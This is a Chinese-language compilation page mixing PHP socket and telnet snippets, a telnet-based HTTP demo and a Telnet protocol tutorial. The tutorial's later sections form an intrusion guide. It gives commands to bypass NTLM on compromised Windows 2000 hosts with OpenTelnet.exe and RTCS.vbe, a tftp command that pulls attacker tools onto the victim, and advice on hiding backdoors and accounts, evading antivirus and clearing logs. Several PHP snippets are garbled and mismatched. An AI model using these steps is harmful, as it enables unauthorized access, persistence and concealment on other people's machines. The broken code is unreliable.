php獲取telnet內容,telnet獲取文件

本文目錄一覽:

php讀取文本文件內容~

$content = file_get_contents(‘test.txt’);

$arr = explode(“\n”, $content);

echo “table”;

foreach ($arr as $v) {

$tmp = explode(” “, $v);

echo “tr”;

echo “td” . $tmp[0] . “/td”;

echo “td” . $tmp[1] . “/td”;

echo “td” . $tmp[2] . “/td”;

echo “td” . $tmp[3] . “/td”;

echo “/tr”;

unset($tmp);

}

echo “/table”;

PHP連接telnet並執行命令

?php 

// Create the socket and connect 

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); 

$connection = socket_connect($socket,』localhost』, 1337); 

while($buffer = socket_read($socket, 1024, PHP_NORMAL_READ)) 

 if($buffer == 「NO DATA」) 

 { 

 echo(「pNO DATA/p」); 

 break;

 }

 else

 {

  // Do something with the data in the buffer 

  echo(「pBuffer Data: 「 . $buffer . 「/p」); 

 } 

echo(「pWriting to Socket/p」);

// Write some test data to our socket

if(!socket_write($socket, 「SOME DATA\r\n」))

{

 echo(「pWrite failed/p」); 

// Read any response from the socket

while($buffer = socket_read($socket, 1024, PHP_NORMAL_READ))

{

 echo(「pData sent was: SOME DATAbr Response was:」 . $buffer . 「/p」); 

echo(「pDone Reading from Socket/p」); 

?

其實就是 tcp socket傳輸,網上很多例子

我無節操的隨便找了一份,應該能用。

你使用的時候修改下socket_connect的ip和port就行

命令就是socket_write時的參數

HTTP系列二: 使用telnet模擬http請求

上一篇講解了http協議的大致原理與基本格式,這一篇使用mac系統自帶telnet工具來模擬http請求,分為GET請求和POST請求

為了測試使用,我在本地伺服器上上傳了一個php腳本,

這個腳本的功能是在瀏覽器輸入用戶名和密碼,正確的用戶名為zhangsan,密碼為1234,如果用戶名和密碼正確,那麼就返回username=zhangsan,如果用戶名和密碼不正確,那麼就返回空字元。同時支持get請求和post請求,會把請求方法也輸出。

1.首先打開終端,在終端輸入telnet 127.0.0.1 80

2.連接成功後,按終端提示 按住control+] 進入telnet命令行,注意命令操作一定要快,因為telnet連接web伺服器後,在短時間內就會被web伺服器關閉連接。具體連接時間是多少不太清楚,目測1分鐘左右。所以最好提前把需要輸入的命令複製好,等用的時候直接複製粘貼。

為了方便,我就把命令敲在此處:

GET /login.php?username=zhangpassword=1234 HTTP/1.1

Host:localhost

3.注意此處一定要在按一下回車,不能直接在telnet後面輸入命令

4.輸入兩條命令後 連續按兩次回車 即是發出請求

可以看到,伺服器返回是登錄成功。

post請求與get請求前邊操作一致,只是請求行 請求頭 與請求頭有區別

一個post請求的命令如下:

POST /login.php HTTP/1.1

Host:localhost

Content-type:application/x-www-form-urlencoded

content-length:28

username=zhangpassword=1234

注意請求頭輸入完之後要留一個空行,表示請求頭輸入完成,接下來的內容是請求體。

可以看到telnet發送的POST請求也得到了伺服器的正確響應。

通過使用telnet模擬http的請求,我們發現,其實只要我們發送給伺服器的消息的格式符合http請求規範,那麼http伺服器(apache,ngnix)就能正確響應我們的請求,而瀏覽器所做的工作就是包裝我們發送的http請求,形成符合規範的http請求,詳細過程我們可以通過谷歌瀏覽器或者抓包工具進行抓取分析。

簡述Telnet的內容和功能

Telnet協議是TCP/IP協議族中的一員,是Internet遠程登陸服務的標準協議和主要方式。它為用戶提供了在本地計算機上完成遠程主機工作的能力。在終端使用者的電腦上使用telnet程序,用它連接到伺服器。終端使用者可以在telnet程序中輸入命令,這些命令會在伺服器上運行,就像直接在伺服器的控制台上輸入一樣。可以在本地就能控制伺服器。要開始一個telnet會話,必須輸入用戶名和密碼來登錄伺服器。Telnet是常用的遠程控制Web伺服器的方法。

它最初是由ARPANET開發的,但是現在它主要用於Internet會話。它的基本功能是,允許用戶登錄進入遠程主機系統。起初,它只是讓用戶的本地計算機與遠程計算機連接,從而成為遠程主機的一個終端。它的一些較新的版本在本地執行更多的處理,於是可以提供更好的響應,並且減少了通過鏈路發送到遠程主機的信息數量。

一 摘要

Telnet的應用不僅方便了我們進行遠程登錄,也給hacker們提供了又一種入侵手段和後門,但無論如何,在你盡情享受Telnet所帶給你的便捷的同時,你是否真正的了解Telnet呢?

二 遠程登錄

Telnet服務雖然也屬於客戶機/伺服器模型的服務,但它更大的意義在於實現了基於Telnet協議的遠程登錄(遠程互動式計算),那麼就讓我們來認識一下遠程登錄。

1 遠程登陸的基本概念

先來看看什麼叫登錄:分時系統允許多個用戶同時使用一台計算機,為了保證系統的安全和記賬方便,系統要求每個用戶有單獨的帳號作為登錄標識,系統還為每個用戶指定了一個口令。用戶在使用該系統之前要輸入標識和口令,這個過程被稱為’登錄’。

遠程登陸是指用戶使用Telnet命令,使自己的計算機暫時成為遠程主機的一個模擬終端的過程。模擬終端等效於一個非智能的機器,它只負責把用戶輸入的每個字元傳遞給主機,再將主機輸出的每個信息回顯在屏幕上。

2 遠程登陸的產生及發展

我們可以先構想一個提供遠程文字編輯的服務,這個服務的實現需要一個接受編輯文件請求和數據的伺服器以及一個發送此請求的客戶機。客戶機將建立一個從本地機到伺服器的TCP連接,當然這需要伺服器的應答,然後向伺服器發送鍵入的信息(文件編輯信息),並讀取從伺服器返回的輸出。以上便是一個標準而普通的客戶機/伺服器模型的服務。

似乎有了客戶機/伺服器模型的服務,一切遠程問題都可以解決了。然而實際並非你想像的那樣簡單,如果我們僅需要遠程編輯文件,那麼剛才所構想的服務完全可以勝任,但假如我們的要求並不是這麼簡單,我們還想實現遠程用戶管理,遠程數據錄入,遠程系統維護,想實現一切可以在遠程主機上實現的操作,那麼我們將需要大量專用的伺服器程序並為每一個可計算服務都使用一個伺服器進程,隨之而來的問題是:遠程機器會很快對伺服器進程應接不暇,並淹沒在進程的海洋里(我們在這裡排除最專業化的遠程機器)。

那麼有沒有辦法解決呢?當然有,我們可以用遠程登錄來解決這一切。我們允許用戶在遠地機器上建立一個登錄會話,然後通過執行命令來實現更一般的服務,就像在本地操作一樣。這樣,我們便可以訪問遠地系統上所有可用的命令,並且系統設計員不需提供多個專用地伺服器程序。

問題發展到這裡好像前途一片光明了,用遠程登錄總應該解決問題了吧,但要實現遠程登陸並不簡單。不考慮網路設計的計算機系統期望用戶只從直接相連的鍵盤和顯示器上登錄,在這種機器上增加遠程登陸功能需要修改機器的操作系統,這是極其艱巨也是我們盡量避免的。因此我們應該集中力量構造遠程登陸伺服器軟體,雖然這樣也是比較困難的。為什麼說這樣做也比較困難呢?

舉個例子來說:一般,操作系統會為一些特殊按鍵分配特殊的含義,比如本地系統將’Ctrl+C’解釋為:’終止當前運行的命令進程’。但假設我們已經運行了遠程登陸伺服器軟體,’Ctrl+C’也有可能無法被傳送到遠地機器,如果客戶機真的將’Ctrl+C’傳到了遠地機器,那麼’Ctrl+C’這個命令有可能不能終止本地的進程,也就是說在這裡很可能會產生混亂。而且這僅僅是遇到的難題之一。

但儘管有技術上的困難,系統編程人員還是設法構造了能夠應用於大多數操作系統的遠程登陸伺服器軟體,並構造了充當客戶機的應用軟體。通常,客戶機軟體取消了除一個鍵以外的所有鍵的本地解釋,並將這些本地解釋相應的轉換成遠地解釋,這就使得客戶機軟體與遠地機器的交互,就如同坐在遠程主機面前一樣,從而避免了上述所提到的混亂。而那個唯一例外的鍵,可以使用戶回到本地環境。

將遠程登陸伺服器設計為應用級軟體,還有另一個要求,那就是需要操作系統提供對偽終端(pseudo terminal)的支持。我們用偽終端描述操作系統的入口點,它允許像Telnet伺服器一樣的程序向操作系統傳送字元,並且使得字元像是來自本地鍵盤一樣。只有使用這樣的操作系統,才能將遠程登陸伺服器設計為應用級軟體(比如Telnet伺服器軟體),否則,本地操作系統和遠地系統傳送將不能識別從對方傳送過來的信息(因為它們僅能識別從本地鍵盤所鍵入的信息),遠程登陸將宣告失敗。

將遠程登陸伺服器設計為應用級軟體雖然有其顯著的優點:比將代碼嵌入操作系統更易修改和控制伺服器。但其也有效率不高的缺點(後面的內容將會給予解釋),好在用戶鍵入信息的速率不高,這種設計還是可以接受的。

3 遠程登錄的工作過程

使用Telnet協議進行遠程登陸時需要滿足以下條件:在本的計算機上必須裝有包含Telnet協議的客戶程序;必須知道遠程主機的Ip地址或域名;必須知道登錄標識與口令。

Telnet遠程登錄服務分為以下4個過程:

1)本地與遠程主機建立連接。該過程實際上是建立一個TCP連接,用戶必須知道遠程主機的Ip地址或域名;

2)將本地終端上輸入的用戶名和口令及以後輸入的任何命令或字元以NVT(Net Virtual Terminal)格式傳送到遠程主機。該過程實際上是從本地主機向遠程主機發送一個IP數據包;

3)將遠程主機輸出的NVT格式的數據轉化為本地所接受的格式送回本地終端,包括輸入命令回顯和命令執行結果;

4)最後,本地終端對遠程主機進行撤消連接。該過程是撤銷一個TCP連接。

上面的內容只是討論了遠程登陸最基本的東西,其中的複雜和編程人員的艱辛是我們難以想像的,不知道你在舒服的使用Telnet的同時,是否想到了這些!

三 Telnet協議

我們知道Telnet伺服器軟體是我們最常用的遠程登錄伺服器軟體,是一種典型的客戶機/伺服器模型的服務,它應用Telnet協議來工作。那麼,什麼是Telnet協議?它都具備哪些特點呢?

1 基本內容

Telnet協議是TCP/IP協議族中的一員,是Internet遠程登陸服務的標準協議。應用Telnet協議能夠把本地用戶所使用的計算機變成遠程主機系統的一個終端。它提供了三種基本服務:

1)Telnet定義一個網路虛擬終端為遠的系統提供一個標準介面。客戶機程序不必詳細了解遠的系統,他們只需構造使用標準介面的程序;

2)Telnet包括一個允許客戶機和伺服器協商選項的機制,而且它還提供一組標準選項;

3)Telnet對稱處理連接的兩端,即Telnet不強迫客戶機從鍵盤輸入,也不強迫客戶機在屏幕上顯示輸出。

2 適應異構

為了使多個操作系統間的Telnet交互操作成為可能,就必須詳細了解異構計算機和操作系統。比如,一些操作系統需要每行文本用ASCII回車控制符(CR)結束,另一些系統則需要使用ASCII換行符(LF),還有一些系統需要用兩個字元的序列回車-換行(CR-LF);再比如,大多數操作系統為用戶提供了一個中斷程序運行的快捷鍵,但這個快捷鍵在各個系統中有可能不同(一些系統使用CTRL+C,而另一些系統使用ESCAPE)。如果不考慮系統間的異構性,那麼在本地發出的字元或命令,傳送到遠地並被遠地系統解釋後很可能會不準確或者出現錯誤。因此,Telnet協議必須解決這個問題。

為了適應異構環境,Telnet協議定義了數據和命令在Internet上的傳輸方式,此定義被稱作網路虛擬終端NVT(Net Virtual Terminal)。它的應用過程如下:

對於發送的數據:客戶機軟體把來自用戶終端的按鍵和命令序列轉換為NVT格式,並發送到伺服器,伺服器軟體將收到的數據和命令,從NVT格式轉換為遠地系統需要的格式;

對於返回的數據:遠地伺服器將數據從遠地機器的格式轉換為NVT格式,而本地客戶機將將接收到的NVT格式數據再轉換為本地的格式。

對於NVT格式的詳細定義,有興趣的朋友可以去查找相關資料。

3 傳送遠地命令

我們知道絕大多數操作系統都提供各種快捷鍵來實現相應的控制命令,當用戶在本地終端鍵入這些快捷鍵的時候,本地系統將執行相應的控制命令,而不把這些快捷鍵作為輸入。那麼對於Telnet來說,它是用什麼來實現控制命令的遠地傳送呢?

Telnet同樣使用NVT來定義如何從客戶機將控制功能傳送到伺服器。我們知道USASCII字符集包括95個可列印字元和33個控制碼。當用戶從本地鍵入普通字元時,NVT將按照其原始含義傳送;當用戶鍵入快捷鍵(組合鍵)時,NVT將把它轉化為特殊的ASCII字元在網路上傳送,並在其到達遠地機器後轉化為相應的控制命令。將正常ASCII字符集與控制命令區分主要有兩個原因:

1)這種區分意味著Telnet具有更大的靈活性:它可在客戶機與伺服器間傳送所有可能的ASCII字元以及所有控制功能;

2)這種區分使得客戶機可以無二義性的指定信令,而不會產生控制功能與普通字元的混亂。

4 數據流向

上面我們提到過將Telnet設計為應用級軟體有一個缺點,那就是:效率不高。這是為什麼呢?下面給出Telnet中的數據流向:

數據信息被用戶從本地鍵盤鍵入並通過操作系統傳到客戶機程序,客戶機程序將其處理後返回操作系統,並由操作系統經過網路傳送到遠地機器,遠地操作系統將所接收數據傳給伺服器程序,並經伺服器程序再次處理後返回到操作系統上的偽終端入口點,最後,遠地操作系統將數據傳送到用戶正在運行的應用程序,這便是一次完整的輸入過程;輸出將按照同一通路從伺服器傳送到客戶機。

因為每一次的輸入和輸出,計算機將切換進程環境好幾次,這個開銷是很昂貴的。還好用戶的鍵入速率並不算高,這個缺點我們仍然能夠接受。

5 強制命令

我們應該考慮到這樣一種情況:假設本地用戶運行了遠地機器的一個無休止循環的錯誤命令或程序,且此命令或程序已經停止讀取輸入,那麼操作系統的緩衝區可能因此而被佔滿,如果這樣,遠地伺服器也無法再將數據寫入偽終端,並且最終導致停止從TCP連接讀取數據,TCP連接的緩衝區最終也會被佔滿,從而導致阻止數據流流入此連接。如果以上事情真的發生了,那麼本地用戶將失去對遠地機器的控制。

為了解決此問題,Telnet協議必須使用外帶信令以便強制伺服器讀取一個控制命令。我們知道TCP用緊急數據機制實現外帶數據信令,那麼Telnet只要再附加一個被稱為數據標記(date mark)的保留八位組,並通過讓TCP發送已設置緊急數據比特的報文段通知伺服器便可以了,攜帶緊急數據的報文段將繞過流量控制直接到達伺服器。作為對緊急信令的相應,伺服器將讀取並拋棄所有數據,直到找到了一個數據標記。伺服器在遇到了數據標記後將返回正常的處理過程。

6 選項協商

由於Telnet兩端的機器和操作系統的異構性,使得Telnet不可能也不應該嚴格規定每一個telnet連接的詳細配置,否則將大大影響Telnet的適應異構性。因此,Telnet採用選項協商機制來解決這一問題。

Telnet選項的範圍很廣:一些選項擴充了大方向的功能,而一些選項制涉及一些微小細節。例如:有一個選項可以控制Telnet是在半雙工還是全雙工模式下工作(大方向);還有一個選項允許遠地機器上的伺服器決定用戶終端類型(小細節)。

Telnet選項的協商方式也很有意思,它對於每個選項的處理都是對稱的,即任何一端都可以發出協商申請;任何一端都可以接受或拒絕這個申請。另外,如果一端試圖協商另一端不了解的選項,接受請求的一端可簡單的拒絕協商。因此,有可能將更新,更複雜的Telnet客戶機伺服器版本與較老的,不太複雜的版本進行交互操作。如果客戶機和伺服器都理解新的選項,可能會對交互有所改善。否則,它們將一起轉到效率較低但可工作的方式下運行。所有的這些設計,都是為了增強適應異構性,可見Telnet的適應異構性對其的應用和發展是多麼重要。

上面討論了一些原理方面的東西,雖然我們在Telnet的使用過程中很難接觸到這一層面,但我認為了解這些是有意義的,它會給我們帶來許多啟示。下面讓我們來看看Win2000的Telnet服務。

(本系列教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區 )

四 Win2000的Telnet服務

其實從應用層面上,Win2000的Telnet服務並沒有什麼可說的,絕大部分內容你都可以從HELP文件中得到,我在此只是把它稍微整理一下而已。

1 基本配置

Win2000為我們提供了Telnet客戶機和伺服器程序:Telnet.exe是客戶機程序(Client),tlntsvr.exe是伺服器程序(server),同時它還為我們提供了Telnet伺服器管理程序tlntadmn.exe。

Windows 2000 默認安裝了 Telnet 服務,但是並沒有默認啟動。下面給出HELP文件中 Telnet 服務的一部分默認設置:

AllowTrustedDomain:是否允許域用戶訪問。默認值是1,允許信任域用戶訪問。可以改為0: 不允許域用戶訪問(只允許本地用戶)。

DefaultDomain:可以對與該計算機具有信任關係的任何域設置。默認值是”.”。

DefaultShell:顯示 shell 安裝的路徑位置。默認值是: %systemroot%\System32\Cmd.exe /q /k

MaxFailedLogins:在連接終止之前顯示嘗試登錄失敗的最大次數。默認是3。

LoginScript:顯示 Telnet 伺服器登錄腳本的路徑位置。默認的位置就是「%systemroot%\System32\login.cmd」,你可以更改腳本內容,這樣登錄進Telnet的歡迎屏幕就不一樣了。

NTLM:NTLM身份驗證選項。默認是2。可以有下面這些值:

0: 不使用 NTLM 身份驗證。

1: 先嘗試 NTLM 身份驗證,如果失敗,再使用用戶名和密碼。

2: 只使用 NTLM 身份驗證。

TelnetPort:顯示 telnet 伺服器偵聽 telnet 請求的埠。默認是:23。你也可以更改為其他埠。

以上各項設置你可以使用tlntadmn.exe(Telnet伺服器管理程序)來進行非常方便的配置,配置後需要重新啟動Telnet服務。如圖1

2 NTLM

提到了telnet就不能不提NTLM,我想這也是讓入侵者最為頭痛的一件事,哪怕你獲得了管理員帳號和密碼,想簡單通過NTLM也並非易事,況且win2000中的telnet默認僅以NTLM方式驗證身份,這就讓我們不得不關注NTLM這個東東,那麼什麼是NTLM呢?

早期的SMB協議在網路上明文傳輸口令,後來出現了”LAN Manager Challenge/Response”驗證機制,簡稱LM,它十分簡單以至很容易被破解,微軟隨後提出了WindowsNT挑戰/響應驗證機制,即NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。NTLM工作流程是這樣的:

1、客戶端首先在本地加密當前用戶的密碼成為密碼散列

2、客戶端向伺服器發送自己的帳號,這個帳號是沒有經過加密的,明文直接傳輸

3、伺服器產生一個16位的隨機數字發送給客戶端,作為一個 challenge(挑戰)

4、客戶端再用加密後的密碼散列來加密這個 challenge ,然後把這個返回給伺服器。作為 response(響應)

5、伺服器把用戶名、給客戶端的challenge 、客戶端返回的 response 這三個東西,發送域控制器

6、域控制器用這個用戶名在 SAM密碼管理庫中找到這個用戶的密碼散列,然後使用這個密碼散列來加密 challenge。

7、域控制器比較兩次加密的 challenge ,如果一樣,那麼認證成功。

從上面的過程我們可以看出,NTLM是以當前用戶的身份向Telnet伺服器發送登錄請求的,而不是用你掃到的對方管理員的帳戶和密碼登錄,顯然,你的登錄將會失敗。舉個例子來說,你家的機器名為A(本地機器),你入侵的機器名為B(遠地機器),你在A上的帳戶是xinxin,密碼是1234,你掃到B的管理員帳號是Administrator,密碼是5678,當你想Telnet到B時,NTLM將自動以當前用戶的帳號和密碼作為登錄的憑據來進行上面的7項操作,即用xinxin和1234,而並非用你掃到的Administrator和5678,且這些都是自動完成的,根本不給你插手的機會,因此你的登錄操作將失敗。

由於Telnet伺服器對NTLM的使用有3個選項,所以當你Telnet遠地機器時,會顯示下面情況中的一種:

1)身份驗證選項=0時

=====================================

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)

Welcome to Microsoft Telnet Service

Telnet Server Build 5.00.99201.1

login:

password:

\為0時不使用NTML身份驗證,直接輸入用戶名和密碼,比如你可以輸入掃到的Administrator和5678

2)身份驗證選項=1時

=====================================

NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)

Welcome to Microsoft Telnet Service

Telnet Server Build 5.00.99201.1

login:

password:

\先嘗試 NTLM 身份驗證,如果失敗,再使用用戶名和密碼,其實這種方式對於我們來說,與上一種方式沒什麼區別

3)身份驗證選項=2時

=====================================

NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password

Server allows NTLM authentication only

Server has closed connection

遺失對主機的連接。

C:\

\仔細看看上面的顯示,根本沒有給你輸入用戶名和密碼的機會,直接斷開連接,掃到了密碼也是白掃

所以對於入侵者來說,NTLM是橫在我們面前的一座大山,必須要除掉它,一般我們有如下幾種方法:

1通過修改遠程註冊表更改telnet伺服器配置,將驗證方式從2改為1或0;

2使用NTLM.exe,上傳後直接運行,可將telnet伺服器驗證方式從2改為1;

3在本地建立掃描到的用戶,以此用戶身份開啟telnet客戶機並進行遠程登錄;

4使用軟體,比如opentelnet.exe(需要管理員許可權且開啟IPC管道)

5使用腳本,如RTCS,(需要管理員許可權但不依賴IPC管道)

基本上是以上的5種,其中後兩種是我們比較常用的開telnet的手法,而且使用方法十分簡單,命令如下:

OpenTelnet.exe \server username password NTLMAuthor telnetport

OpenTelnet.exe \伺服器地址 管理員用戶名 密碼 驗證方式(填0或1) telnet埠

cscript RTCS.vbe targetIP username password NTLMAuthor telnetport

cscript RTCS.vbe 目標IP 管理員用戶名 密碼 驗證方式 tlnet埠

五 在telnet中該做什麼

本來寫到上面就想結束了,不過許多朋友都說telnet上去後不知道該做什麼了,既然這樣,那我就拋磚引玉吧,這次不講具體做法,只是說說思路,什麼?為什麼不講具體做法?篇幅不夠嘛,以後我會一一解釋的。

1 查看系統信息

呵呵,其實就是隨處看看,看看他的系統配置和版本(用type c:\boot.ini來知道pro版或server版),看看都裝了什麼服務或軟體(從目錄名就可以知道了),看看有什麼重要或有趣的文件啦(唉,要是國外的機器,看也看不懂),看看他的用戶情況,總之就是儘可能多的了解系統,為一會裝後門摸底。

2 使用tftp傳送文件

想必大家都遇到過在telnet中傳輸文件的問題,因為我們習慣了在ipc管道中的文件傳輸,所以有些朋友喜歡用net share ipc$ 來打開管道,進而利用copy來傳輸文件。不過這樣反而麻煩,既然我們已經得到了shell,我們可以用TFTP命令來完成這一切,什麼是TFTP呢?

用TFTP(Trivial File Transfer Protocol)來實現文件的傳送是一種基於UDP連接的文件傳輸,一般是使用Windows自帶的t和一個TFTP伺服器端軟體構成一個完整的傳輸結構。它是這樣使用的: 首先運行本地的TFTP Server(比如tftpd32.exe)軟體並保證始終開啟直至傳輸全部完成, 然後在telnet中(當然你也可以在其他shell中)運行下面的命令:

C:\tftp –i ip get xinxin.exe c:\abc\xinxin.exe

其中ip為你自己機器的ip,且上傳文件要與TFTP伺服器端在同一目錄下,這樣你就可以把xinxin.exe上傳到c盤abc目錄下了(其實是從tftp伺服器下載來的)

需要指出的是,如果使用代理IP,你將不能實現與外部網路的文件傳送。因為你的代理網關在進行數據封裝的時候會將自己的IP地址加入到你的數據報中,代替你的內部網路地址,所以在外部網路進行MAC定址時是找不到你這台TFTP伺服器的。

3 安置後門

安置後門放在第二步好像早了點,如果你入侵還有其他目的,比如以破壞為主,或者是來修改主頁的,那麼這些事情當然可以在安置後門之前做;如果你只是想得到一隻肉雞,那就沒什麼可說的了,安後門吧。

後門的種類繁多,也給我們提供了很大的選擇餘地,能夠根據具體情況選擇合適的後門的確是一門學問。常用的後門一般有:木馬,asp木馬,遠程控制軟體,克隆帳戶,建立並隱藏帳戶,telnet,telnet擴展的shell,終端服務等。安置一個好的後門通常要注意以下幾點:

1 不會被防火牆查殺及阻礙通信:被加入病毒庫的後門最好加殼以逃過防火牆,盡量用低埠通信,以免被防火牆屏蔽。

2 最大限度增加隱蔽性:如果你選擇遠程控制軟體,要注意被控端的安裝提示和小圖標,以及是否同步畫面;如果你在帳戶上做文章,要盡量保持在cmd和用戶管理中都不出破綻;如果你選擇放木馬或telnet擴展,要注意文件和進程的隱藏;如果新開了終端服務(入侵前並沒有開),一定要該掉3389這個顯眼的埠,且越低越好。

3 不要當管理員不存在:這是一個大忌,許多朋友在只有默認帳戶的機器上建立類似’hacking’的管理員帳戶,真是無知者無畏呀。所以安置後門的時候,想想管理員疏忽的地方會在哪裡。

4 打補丁

如果想獨霸肉雞,就要會打補丁,要知道對肉雞的競爭是很激烈的。怎麼打補丁呢?這個也要問?想想你是怎麼進來的吧。算了,提示一下,除了修補大的漏洞以外(上傳官方補丁並運行),也要注意它的共享,ipc$共享(最好都關閉),可疑埠,容易被利用的服務等。不過打補丁也要注意隱蔽性的,不要讓管理員發現大的改動。

5 清除日誌

可以手動或利用軟體,如果不太會就去找相關教材吧,在這裡我不詳細介紹了。

如何通過php連接遠程主機並操作

一、最佳方案是在77機器上安裝apache和php

二、可以通過管道控制使用telnet登錄77號機執行命令並獲取結果,ssh連接本人沒有做過,telnet方法如下:

$f=fopen(“telnet://192.168.0.77″,”rw”);

$s=fgets($fp);

fputs($fp,”root”);

$s=fgets($fp);

fputs($fp,”pass”);

$s=fgets($fp);

fputs($fp,”df -h”);

while(!feof($fp)){

$fp=fgets($fp);

echo $s;

}

fclose($fp);

手機輸入真累~~~

原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/230475.html

(0)
打賞 微信掃一掃 微信掃一掃 支付寶掃一掃 支付寶掃一掃
小藍的頭像小藍
上一篇 2024-12-10 18:17
下一篇 2024-12-10 18:17

相關推薦

發表回復

登錄後才能評論